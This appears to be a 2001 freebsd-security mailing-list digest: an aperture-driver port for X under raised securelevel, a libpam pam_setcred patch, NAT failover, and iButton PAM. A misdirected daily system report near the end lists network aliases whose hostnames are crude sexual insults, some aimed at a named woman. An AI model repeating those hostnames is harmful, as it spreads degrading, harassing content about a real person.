From owner-freebsd-security Sun Jan 21 12:52:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 0B66937B400 for ; Sun, 21 Jan 2001 12:52:33 -0800 (PST) Received: (qmail 17193 invoked by uid 0); 21 Jan 2001 20:52:29 -0000 Received: from pc19ebf65.dip.t-dialin.net (HELO forge.local) (193.158.191.101) by mail.gmx.net (mp002-rz3) with SMTP; 21 Jan 2001 20:52:29 -0000 Received: from thomas by forge.local with local (Exim 3.16 #1 (Debian)) id 14KRTN-0000de-00 for ; Sun, 21 Jan 2001 21:52:25 +0100 Date: Sun, 21 Jan 2001 21:52:25 +0100 To: freebsd-security@freebsd.org Subject: aperture driver for FreeBSD Message-ID: <20010121215225.A2033@crow.dom2ip.de> Mail-Followup-To: tmoestl@gmx.net, freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i From: Thomas Moestl Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, as I have mentioned some time ago on this list, I have been porting then XFree86/OpenBSD aperture "driver" to FreeBSD. For those who do not know, the OpenBSD aperture driver enables running X even when the securelevel is raised by allowing access to the memory range from 0xa0000 to 0xfffff (via /dev/mem) and to all io ports (via i386_iopl). I have extended the concept to allow a list of io and memory regions for which access is allowed. These regions are settable via a machdep sysctl (the implementation is currently only for the i386 arch, but should be relatively easy to port). Another sysctl knob is used to turn the aperture driver on and off, and set the mode. There are currently two modes defined, one gives access to the io regions as defined in the respective sysctl when a process opens /dev/io (using the io permission bitmap), and the second will give full port access (using IOPL). The second mode is needed because some XFree86 drivers use cli and sti (ugh!), but it is obviously less secure. A great disadvantage of the first mode is that processes will just get a SIGBUS when trying to acess a forbidden port (even when it has opened /dev/io, which should guarantee full io privileges). This is admittedly unclean; the relevant applications should be changed to use i386_set_ioperm (which was modified to allow access to the specified port ranges even when securelevel is raised, provided that the aperture driver was enabled via the respective sysctl). This change is apparently very non-trivial for X. Unfortunately, it is also not easy to figure out the port ranges X wants to access for a specified driver; using only the detected io range for the card (plus maybe some static additions) will not work for at least some drivers. The patch is at http://www.tu-bs.de/~y0015675/aperture.diff , and a little additional info can be found at http://www.tu-bs.de/~y0015675/README.aperture Any comments? Any chance that this can go in someday? - thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 21 12:58:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 4E97137B401 for ; Sun, 21 Jan 2001 12:58:14 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 8CF9D19C5; Sun, 21 Jan 2001 15:58:13 -0500 (EST) Date: Sun, 21 Jan 2001 15:58:13 -0500 From: Will Andrews To: Thomas Moestl Cc: freebsd-security@FreeBSD.ORG Subject: Re: aperture driver for FreeBSD Message-ID: <20010121155813.G1663@puck.firepipe.net> Reply-To: Will Andrews References: <20010121215225.A2033@crow.dom2ip.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Pgaa2uWPnPrfixyx" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010121215225.A2033@crow.dom2ip.de>; from tmoestl@gmx.net on Sun, Jan 21, 2001 at 09:52:25PM +0100 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Pgaa2uWPnPrfixyx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jan 21, 2001 at 09:52:25PM +0100, Thomas Moestl wrote: > as I have mentioned some time ago on this list, I have been porting then > XFree86/OpenBSD aperture "driver" to FreeBSD. [...] Wow! This is really cool. Thanks, Thomas. Just one question - why is it i386 only? Why can't it be MI? --=20 wca --Pgaa2uWPnPrfixyx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6a01kF47idPgWcsURAnmiAJ9oEmhmnUIqLmnLco9WBzkYFwMjrwCfeDHV qfEp6yZXyUCoG4zqMM8qL8g= =FQZ4 -----END PGP SIGNATURE----- --Pgaa2uWPnPrfixyx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 21 13:43:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id EB71D37B400 for ; Sun, 21 Jan 2001 13:43:00 -0800 (PST) Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id IAA21385 for ; Mon, 22 Jan 2001 08:42:56 +1100 (EDT) Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37645) with ESMTP id <01JZ79WY3KFKIB9ET6@cim.alcatel.com.au> for freebsd-security@FreeBSD.ORG; Mon, 22 Jan 2001 08:42:50 +1100 Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.1/8.11.1) id f0LLgpT65053 for freebsd-security@FreeBSD.ORG; Mon, 22 Jan 2001 08:42:51 +1100 (EST envelope-from jeremyp) Content-return: prohibited Date: Mon, 22 Jan 2001 08:42:51 +1100 From: Peter Jeremy Subject: Re: Failover firewalls with ipfw? In-reply-to: ; from sean@rentul.net on Fri, Jan 19, 2001 at 02:30:38PM -0500 To: freebsd-security@FreeBSD.ORG Mail-followup-to: freebsd-security@FreeBSD.ORG Message-id: <20010122084251.N9165@gsmx07.alcatel.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.5i References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2001-Jan-19 14:30:38 -0500, Sean Lutner wrote: > Does anyone out there know of any utilities/code/addons I could use to >implement a failover pair of firewalls using ipfw and fbsd? As a related issue, has anyone developed code what would allow two boxes to share natd map entries? (dummynet is a requirement, so suggestions to use IPfilter/IPnat, or similar, won't work). This would allow a NAT'd TCP connection to fail-over between two boxes. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 21 15:32:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id C017337B404 for ; Sun, 21 Jan 2001 15:32:38 -0800 (PST) Received: (qmail 23913 invoked by uid 0); 21 Jan 2001 21:43:05 -0000 Received: from pc19ebf65.dip.t-dialin.net (HELO forge.local) (193.158.191.101) by mail.gmx.net (mp004-rz3) with SMTP; 21 Jan 2001 21:43:05 -0000 Received: from thomas by forge.local with local (Exim 3.16 #1 (Debian)) id 14KSGL-0000ga-00 for ; Sun, 21 Jan 2001 22:43:01 +0100 Date: Sun, 21 Jan 2001 22:43:01 +0100 From: Thomas Moestl To: freebsd-security@FreeBSD.ORG Subject: Re: aperture driver for FreeBSD Message-ID: <20010121224301.A2624@crow.dom2ip.de> Mail-Followup-To: Thomas Moestl , freebsd-security@FreeBSD.ORG References: <20010121215225.A2033@crow.dom2ip.de> <20010121155813.G1663@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010121155813.G1663@puck.firepipe.net>; from will@physics.purdue.edu on Sun, Jan 21, 2001 at 03:58:13PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Jan 21, 2001 at 03:58:13PM -0500, Will Andrews wrote: > On Sun, Jan 21, 2001 at 09:52:25PM +0100, Thomas Moestl wrote: > > as I have mentioned some time ago on this list, I have been porting then > > XFree86/OpenBSD aperture "driver" to FreeBSD. > [...] > > Wow! This is really cool. Thanks, Thomas. Just one question - why is > it i386 only? Why can't it be MI? Some of the modified code (i386/i386/mem.c and i386/i386/sys_machdep.c) is architecture specific. The sysctl parsing and list keeping code is largely separated, and it should no be too difficult to add the necessary bits to the alpha mem.c. I am working on this, but I have no means to test the changes. For any newly added architecture (eg. arm?), handlers for it's specific io access method will have to be added (if they need aperture). - thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 6:55:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 685A337B401 for ; Mon, 22 Jan 2001 06:55:00 -0800 (PST) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id BAF13193E4; Mon, 22 Jan 2001 08:54:59 -0600 (CST) Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0MEsxk93199; Mon, 22 Jan 2001 08:54:59 -0600 (CST) (envelope-from nectar@spawn.nectar.com) Date: Mon, 22 Jan 2001 08:54:59 -0600 From: "Jacques A. Vidrine" To: "David J. MacKenzie" Cc: freebsd-security@freebsd.org Subject: Re: Fwd: [PAM broken design? pam_setcred] Message-ID: <20010122085459.A93103@hamlet.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org References: <20010119210820.111B912686@jenkins.web.us.uu.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010119210820.111B912686@jenkins.web.us.uu.net>; from djm@web.us.uu.net on Fri, Jan 19, 2001 at 04:08:20PM -0500 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Jan 19, 2001 at 04:08:20PM -0500, David J. MacKenzie wrote: > > Regardless of whether you authenticate with `skey', `krb5', or `unix', > > pam_sm_setcred is called in pam_skey.so, i.e. the module search starts > > over. By my reading of the Solaris man page, pam_sm_setcred should be > > called in the module that successfully authenticated the user. At any > > rate this seems infinitely more useful. > > > > Excerpt from Solaris 2.6 pam(3): > > > > If the user has been successfully authenticated, the application > > calls pam_setcred() to set any user credentials associated with > > the authentication service. [...] For example, during the call to > > pam_authenticate(), service modules may store data in the handle > > that is intended for use by pam_setcred(). > > I think the PAM spec is unclear on this. > The way ports/security/pam_krb5 handles this situation is: > > In pam_sm_authenticate() it does: > > if ((pamret = pam_set_data(pamh, "ccache", ccache, cleanup_cache)) != 0) { > DLOG("pam_set_data()", pam_strerror(pamh, pamret)); > (void) krb5_cc_destroy(pam_context, ccache); > pamret = PAM_SERVICE_ERR; > goto cleanup; > } > > In pam_sm_setcred() and pam_sm_acct_mgmt() it does: > > if (pam_get_data(pamh, "ccache", (const void **) &ccache)) { > /* User did not use krb5 to login */ > DLOG("ccache", "not found"); > return PAM_SUCCESS; > } > > That is, if there's no data stored by its authenticate function, > that means the user authenticated using some other PAM module. > So it punts and returns success (meaning "I pass, no-op" in this case). > This seems reasonable. That's all fine and good, but pam_sm_setcred in pam_krb5 is unlikely to get called. This is roughly what is happening (example has config with pam_skey then pam_krb5): application: pam_authenticate() libpam: pam_dispatch() pam_skey: pam_sm_authenticate() /* fail */ pam_krb5: pam_sm_authenticate() /* success */ application: pam_setcred() libpam: pam_dispatch() pam_skey: pam_sm_setcred() /* success */ pam_krb5: /* not called */ Does that make it clearer? -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 9:45: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 2503D37B400 for ; Mon, 22 Jan 2001 09:44:46 -0800 (PST) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id RAA26716; Mon, 22 Jan 2001 17:43:44 GMT Message-ID: <3A6C714F.78476DA8@algroup.co.uk> Date: Mon, 22 Jan 2001 17:43:43 +0000 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.76 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Jorge Peixoto Vasquez Cc: security@freebsd.org Subject: Re: [Fwd: A wish and a dream...] References: <3A684CD9.A6B77B86@aker.com.br> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jorge Peixoto Vasquez wrote: > > > > ------------------------------------------------------------------------ > > Subject: Re: A wish and a dream... > Date: Fri, 19 Jan 2001 10:24:03 -0200 > From: Jorge Peixoto Vasquez > Organization: Aker Security Solutions > To: James Wyatt > References: > > James Wyatt wrote: > > > > The iButton also has a CryptoKey which can hold actual passphrases or > > passwords intact until you give it a key. Maybe I also want the > > temperature when I authenticate... (^_^) The iButton stuff isn't hard to > > handle. It would be nice to have a PAM interface for it. - Jy@ > > More than just that. It can hold your private key and do the actual RSA > procesing if you have the password. By doing that, it ensures your key > is never copied. It is just like the normal crypto-smartcards like > CryptoFlex from Schlumberger (www.slb.com). and here's some FreeBSD-friendly source to get you started... :) http://anoncvs.aldigital.co.uk/iBLab/ cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 12:37:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id B241F37B401 for ; Mon, 22 Jan 2001 12:37:41 -0800 (PST) Received: (qmail 25650 invoked by uid 0); 22 Jan 2001 20:37:40 -0000 Received: from p3ee21646.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.70) by mail.gmx.net (mail08) with SMTP; 22 Jan 2001 20:37:40 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id SAA25234 for freebsd-security@FreeBSD.ORG; Mon, 22 Jan 2001 18:01:03 +0100 Date: Mon, 22 Jan 2001 18:01:03 +0100 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Failover firewalls with ipfw? Message-ID: <20010122180102.V253@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20010122084251.N9165@gsmx07.alcatel.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20010122084251.N9165@gsmx07.alcatel.com.au>; from peter.jeremy@alcatel.com.au on Mon, Jan 22, 2001 at 08:42:51AM +1100 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 22, 2001 at 08:42 +1100, Peter Jeremy wrote: > > As a related issue, has anyone developed code what would allow > two boxes to share natd map entries? (dummynet is a > requirement, so suggestions to use IPfilter/IPnat, or similar, > won't work). This would allow a NAT'd TCP connection to > fail-over between two boxes. Although I never did this, the list archive holds repeated reports on successfully running ipf and ipfw in tandem. So you can use ipfw for dummynet (and maybe uid / gid stuff?) and ipf for filtering / translating. See the archive for the sequence the packets are handed up in. Or UTSL. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 12:57: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from jenkins.web.us.uu.net (jenkins.web.us.uu.net [208.240.88.32]) by hub.freebsd.org (Postfix) with ESMTP id 84EE437B402 for ; Mon, 22 Jan 2001 12:56:40 -0800 (PST) Received: by jenkins.web.us.uu.net (Postfix, from userid 515) id CDEE112686; Mon, 22 Jan 2001 15:56:24 -0500 (EST) To: djm@web.us.uu.net, n@nectar.com Subject: Re: Fwd: [PAM broken design? pam_setcred] Cc: freebsd-security@freebsd.org Message-Id: <20010122205624.CDEE112686@jenkins.web.us.uu.net> Date: Mon, 22 Jan 2001 15:56:24 -0500 (EST) From: djm@web.us.uu.net (David J. MacKenzie) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > That's all fine and good, but pam_sm_setcred in pam_krb5 is unlikely > to get called. > > This is roughly what is happening (example has config with pam_skey > then pam_krb5): > > application: pam_authenticate() > libpam: pam_dispatch() > pam_skey: pam_sm_authenticate() /* fail */ > pam_krb5: pam_sm_authenticate() /* success */ > application: pam_setcred() > libpam: pam_dispatch() > pam_skey: pam_sm_setcred() /* success */ > pam_krb5: /* not called */ > > Does that make it clearer? Ya... So, a combination of the pam_get_item technique that pam_krb5 uses, and the Solaris (not Linux-PAM) behavior for dispatching pam_sm_setcred(), would do what you want, right? Given that multiple pam_sm_authenticate() functions might have succeeded, we could either do like Solaris and overkill, calling all auth modules' pam_sm_setcred() functions, or we could keep some state--a list of the auth modules whose pam_sm_authenticate() functions succeeded. That's what you suggested originally, I believe. That approach assumes that applications that don't call pam_authenticate(), such as ones that use Kerberos for authentication, also shouldn't call pam_setcred(). Perhaps that's reasonable; again, it's poorly documented. Which way it is matters to me for my MIT krb5 PAM patches. It would probably be simpler to be compatible with the undocumented Solaris dispatch behavior. Here is a patch to do that that is at least close to being right. I'm not 100% sure that it handles all combinations of return values in various orders the same way that Solaris does. --- contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:19:52 1.1 +++ contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:22:44 @@ -500,6 +500,8 @@ #endif char *mod_full_path=NULL; servicefn func, func2; + int actions2buf[_PAM_RETURN_VALUES]; + int *actions2 = actions; int success; D(("called.")); @@ -649,6 +651,19 @@ _sym = "_pam_sm_authenticate"; _sym2 = "_pam_sm_setcred"; #endif + actions2 = actions2buf; + /* Always run the pam_sm_setcred for all listed auth modules. + Otherwise, we can end up not running the pam_sm_setcred + for auth module(s) that authenticated successfully, + e.g. if an earlier auth module is "sufficient" and + its authenticate fails but its setcred succeeds. + This is also apparently what Solaris PAM does. */ + { + int i; + for (i = 0; i < _PAM_RETURN_VALUES; i++) + actions2[i] = _PAM_ACTION_IGNORE; + actions2[PAM_SUCCESS] = _PAM_ACTION_OK; + } break; case PAM_T_SESS: handler_p = &the_handlers->open_session; @@ -780,7 +795,7 @@ (*handler_p2)->must_fail = must_fail; /* failure forced? */ (*handler_p2)->func = func2; - memcpy((*handler_p2)->actions,actions,sizeof((*handler_p2)->actions)); + memcpy((*handler_p2)->actions,actions2,sizeof((*handler_p2)->actions)); (*handler_p2)->argc = argc; if (argv) { if (((*handler_p2)->argv = malloc(argvlen)) == NULL) { To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 18: 7: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from kyra.unloved.org (kyra.unloved.org [62.58.62.162]) by hub.freebsd.org (Postfix) with ESMTP id 328FD37B400; Mon, 22 Jan 2001 18:06:14 -0800 (PST) Received: by kyra.unloved.org (Postfix) id 13586F431; Tue, 23 Jan 2001 03:06:08 +0100 (CET) Delivered-To: ashp@unloved.org Received: by kyra.unloved.org (Postfix, from userid 0) id 7E839F40E; Tue, 23 Jan 2001 03:06:07 +0100 (CET) To: root@unloved.org Subject: kyra.unloved.org daily run output Message-Id: <20010123020607.7E839F40E@kyra.unloved.org> Date: Tue, 23 Jan 2001 03:06:07 +0100 (CET) From: root@unloved.org (Charlie Root) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Removing stale files from /var/preserve: Cleaning out old system announcements: Removing stale files from /var/rwho: Backup passwd and group files: kyra.unloved.org passwd diffs: 68d67 < orion:(password):2004:2004::0:0:Orion Server:/home/orion:/usr/local/bin/bash 69a69 > postfix:(password):2001:3024::0:0:Postfix Mail System:/nonexistent:/nonexistent kyra.unloved.org group diffs: 93a94 > postfix:*:3024: Verifying group file syntax: Backing up mail aliases: kyra.unloved.org aliases diffs: --- /var/backups/aliases.bak Thu Sep 21 17:28:04 2000 +++ /etc/mail/aliases Mon Jan 22 11:02:55 2001 @@ -1,4 +1,4 @@ -# $FreeBSD: src/etc/mail/aliases,v 1.10.4.1 2000/08/27 17:31:38 gshapiro Exp $ +# $FreeBSD: src/etc/mail/aliases,v 1.10.4.2 2000/12/16 07:03:35 dougb Exp $ # @(#)aliases 5.3 (Berkeley) 5/24/90 # # Aliases in this file will NOT be expanded in the header from @@ -24,8 +24,10 @@ # General redirections for pseudo accounts bin: root +bind: root daemon: root games: root +kmem: root man: root news: root nobody: root @@ -33,6 +35,7 @@ pop: root system: root toor: root +tty: root usenet: news uucp: root xten: root Disk status: Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/ad5s1a 198399 51629 130899 28% / /dev/ad5s2e 9505261 539884 8204957 6% /data /dev/ad5s1f 8473272 2924146 4871265 38% /usr /dev/ad5s1e 992239 18696 894164 2% /var procfs 4 4 0 100% /proc Last dump(s) done (Dump '>' file systems): UUCP status: Network interface status: Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Coll xl0 1500 00:10:4b:09:ec:f0 49045770 0 84287087 4 0 xl0 1500 62.58.62.160/ kyra 49045770 0 84287087 4 0 xl0 1500 jacquie.would jacquie.would.b 49045770 0 84287087 4 0 xl0 1500 my.pussy.gets my.pussy.gets.w 49045770 0 84287087 4 0 xl0 1500 jacquie.loves jacquie.loves.a 49045770 0 84287087 4 0 xl0 1500 twilight.bast twilight.bastar 49045770 0 84287087 4 0 xl0 1500 freebsd.is.be freebsd.is.bett 49045770 0 84287087 4 0 xl0 1500 magic.kablast magic.kablasto. 49045770 0 84287087 4 0 xl0 1500 i.own.decix.n i.own.decix.net 49045770 0 84287087 4 0 xl0 1500 teefers.is.th teefers.is.thra 49045770 0 84287087 4 0 xl0 1500 i.fucked.freu i.fucked.freudi 49045770 0 84287087 4 0 xl0 1500 jacquie.swall jacquie.swallow 49045770 0 84287087 4 0 xl0 1500 unhappy.and/3 unhappy.and 49045770 0 84287087 4 0 xl0 1500 attyz.wants.t attyz.wants.to. 49045770 0 84287087 4 0 xl0 1500 jacquie.is.a. jacquie.is.a.cu 49045770 0 84287087 4 0 xl0 1500 i.am.not.real i.am.not.really 49045770 0 84287087 4 0 xl0 1500 you.need.a.go you.need.a.good 49045770 0 84287087 4 0 xl0 1500 will.never.be will.never.be 49045770 0 84287087 4 0 xl0 1500 vanitywhore.o vanitywhore.org 49045770 0 84287087 4 0 xl0 1500 is.a.masturba is.a.masturbati 49045770 0 84287087 4 0 xl0 1500 works.for.ver works.for.versa 49045770 0 84287087 4 0 xl0 1500 deeply.shallo deeply.shallow. 49045770 0 84287087 4 0 xl0 1500 62.58.48.84/3 62.58.48.84 49045770 0 84287087 4 0 lo0 16384 5114 0 5114 0 0 lo0 16384 127 localhost 5114 0 5114 0 0 Local system status: 3:01AM up 15:55, 1 user, load averages: 0.00, 0.00, 0.00 Mail in local queue: Mail queue is empty Security check: (output mailed separately) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 18: 8:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from kyra.unloved.org (kyra.unloved.org [62.58.62.162]) by hub.freebsd.org (Postfix) with ESMTP id B9C1237B402; Mon, 22 Jan 2001 18:06:15 -0800 (PST) Received: by kyra.unloved.org (Postfix) id E543DF431; Tue, 23 Jan 2001 03:06:14 +0100 (CET) Delivered-To: ashp@unloved.org Received: by kyra.unloved.org (Postfix) via BOUNCE id B6B6FF40E; Tue, 23 Jan 2001 03:06:14 +0100 (CET) Date: Tue, 23 Jan 2001 03:06:14 +0100 (CET) From: MAILER-DAEMON@unloved.org (Mail Delivery System) Subject: Undelivered Mail Returned to Sender To: root@unloved.org MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary="13586F431.980215574/kyra.unloved.org" Message-Id: <20010123020614.B6B6FF40E@kyra.unloved.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a MIME-encapsulated message. --13586F431.980215574/kyra.unloved.org Content-Description: Notification Content-Type: text/plain This is the Postfix program at host kyra.unloved.org. I'm sorry to have to inform you that the message returned below could not be delivered to one or more destinations. For further assistance, please send mail to If you do so, please include this problem report. You can delete your own text from the message returned below. The Postfix program <$header_To@unloved.org>: unknown user: "$header_to" <$home/Mail/lists/freebsd-arch@unloved.org>: unknown user: "$home/mail/lists/freebsd-arch" <$home/Mail/lists/bugtraq@unloved.org>: unknown user: "$home/mail/lists/bugtraq" <$home/Mail/lists/freebsd-current@unloved.org>: unknown user: "$home/mail/lists/freebsd-current" <$home/Mail/lists/freebsd-cvs@unloved.org>: unknown user: "$home/mail/lists/freebsd-cvs" <$home/Mail/lists/freebsd-security@unloved.org>: unknown user: "$home/mail/lists/freebsd-security" <$home/Mail/lists/freeciv@unloved.org>: unknown user: "$home/mail/lists/freeciv" <^freeciv-dev@unloved.org>: unknown user: "^freeciv-dev" : unknown user: "contains" : unknown user: "endif" : unknown user: "if" : unknown user: "matches" : unknown user: "or" : unknown user: "save" : unknown user: "then" <$header_sender@unloved.org>: unknown user: "$header_sender" <$header_X-list@unloved.org>: unknown user: "$header_x-list" <$header_Cc@unloved.org>: unknown user: "$header_cc" --13586F431.980215574/kyra.unloved.org Content-Description: Delivery error report Content-Type: message/delivery-status Reporting-MTA: dns; kyra.unloved.org Arrival-Date: Tue, 23 Jan 2001 03:06:08 +0100 (CET) Final-Recipient: rfc822; $header_To@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_to" Final-Recipient: rfc822; $home/Mail/lists/freebsd-arch@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-arch" Final-Recipient: rfc822; $home/Mail/lists/bugtraq@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/bugtraq" Final-Recipient: rfc822; $home/Mail/lists/freebsd-current@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-current" Final-Recipient: rfc822; $home/Mail/lists/freebsd-cvs@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-cvs" Final-Recipient: rfc822; $home/Mail/lists/freebsd-security@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-security" Final-Recipient: rfc822; $home/Mail/lists/freeciv@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freeciv" Final-Recipient: rfc822; ^freeciv-dev@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "^freeciv-dev" Final-Recipient: rfc822; contains@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "contains" Final-Recipient: rfc822; endif@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "endif" Final-Recipient: rfc822; if@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "if" Final-Recipient: rfc822; matches@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "matches" Final-Recipient: rfc822; or@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "or" Final-Recipient: rfc822; save@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "save" Final-Recipient: rfc822; then@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "then" Final-Recipient: rfc822; $header_sender@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_sender" Final-Recipient: rfc822; $header_X-list@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_x-list" Final-Recipient: rfc822; $header_Cc@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_cc" --13586F431.980215574/kyra.unloved.org Content-Description: Undelivered Message Content-Type: message/rfc822 Received: by kyra.unloved.org (Postfix) id 13586F431; Tue, 23 Jan 2001 03:06:08 +0100 (CET) Delivered-To: ashp@unloved.org Received: by kyra.unloved.org (Postfix, from userid 0) id 7E839F40E; Tue, 23 Jan 2001 03:06:07 +0100 (CET) To: root@unloved.org Subject: kyra.unloved.org daily run output Message-Id: <20010123020607.7E839F40E@kyra.unloved.org> Date: Tue, 23 Jan 2001 03:06:07 +0100 